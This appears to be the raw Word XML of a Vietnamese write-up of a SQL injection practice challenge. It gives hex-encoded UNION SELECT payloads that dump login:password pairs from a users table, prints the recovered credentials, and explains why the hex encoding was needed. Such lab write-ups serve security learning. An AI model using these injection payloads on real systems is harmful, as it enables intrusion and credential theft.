        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2720554e494f4e2053454c45435420312c3223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410A505" w14:textId="6DC58E70" w:rsidR="00815E11" w:rsidRDefault="00AE386C"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Kết quả: id 1 email 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE386C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiêm thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6573F" w14:textId="5B7DEFC4" w:rsidR="00AE386C" w:rsidRDefault="00AE386C" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011E596B" w14:textId="6C3E6935" w:rsidR="00213BB6" w:rsidRDefault="000230C3"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Bây giờ bài toán đã trở nên dễ hơn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315708E5" w14:textId="72FD0FBB" w:rsidR="00E24864" w:rsidRDefault="00E24864" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71517144" w14:textId="4C71229B" w:rsidR="00E24864" w:rsidRDefault="00E24864" w:rsidP="00213BB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Vì kết quả trả về nhiều dòng , phải dùng group_concat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49854D" w14:textId="39F7327A" w:rsidR="00E24864" w:rsidRPr="00AB5510" w:rsidRDefault="00E24864" w:rsidP="00213BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã hóa hex: ‘UNION SELECT </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24864">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1,(select group_concat(login,':',password) from users)#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24864">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24864">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2720554e494f4e2053454c45435420312c2873656c6563742067726f75705f636f6e636174286c6f67696e2c273a272c70617373776f7264292066726f6d2075736572732923</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D45E18" w14:textId="5C51A713" w:rsidR="00AB5510" w:rsidRDefault="00E24864">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438370D9" w14:textId="467B8013" w:rsidR="00E24864" w:rsidRDefault="00E24864">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Id: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED2D80" w14:textId="198E221B" w:rsidR="00E24864" w:rsidRDefault="00E24864">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Email:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24864">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:qs89QdAs9A,jean:superpass,michel:mypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF16E2" w14:textId="49DDDB54" w:rsidR="00F768AD" w:rsidRDefault="00F768AD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F340FD6" w14:textId="05504B05" w:rsidR="00F768AD" w:rsidRPr="00D6575A" w:rsidRDefault="00F768AD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đính chính lại: bài này không dùng mysqli_escape_string() nha, tại sao mình phải mã hóa? Làm như vậy câu lệnh mới thực thi được vì dấu nháy đơn không đúng ah nên ứng dụng báo lỗi. Mà bài này cứ lỗi là báo attack detected! làm mình lầm tưởng là nó sàng lọc dấu nháy đơn.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F768AD" w:rsidRPr="00D65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F4"/>
    <w:rsid w:val="000230C3"/>
    <w:rsid w:val="000E0740"/>
    <w:rsid w:val="00213BB6"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004B344D"/>
    <w:rsid w:val="005C0990"/>
    <w:rsid w:val="006543EC"/>
    <w:rsid w:val="0073731E"/>
    <w:rsid w:val="00815E11"/>
    <w:rsid w:val="00AB5510"/>
    <w:rsid w:val="00AE386C"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00CA01F4"/>
    <w:rsid w:val="00D6575A"/>
    <w:rsid w:val="00E24864"/>
    <w:rsid w:val="00F768A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DCE053"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{02C495E3-8D56-9742-AE4E-71A14CBF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character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00213BB6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00213B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785">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19296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sqli_me.com%3c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2022-10-09T07:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-17T15:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>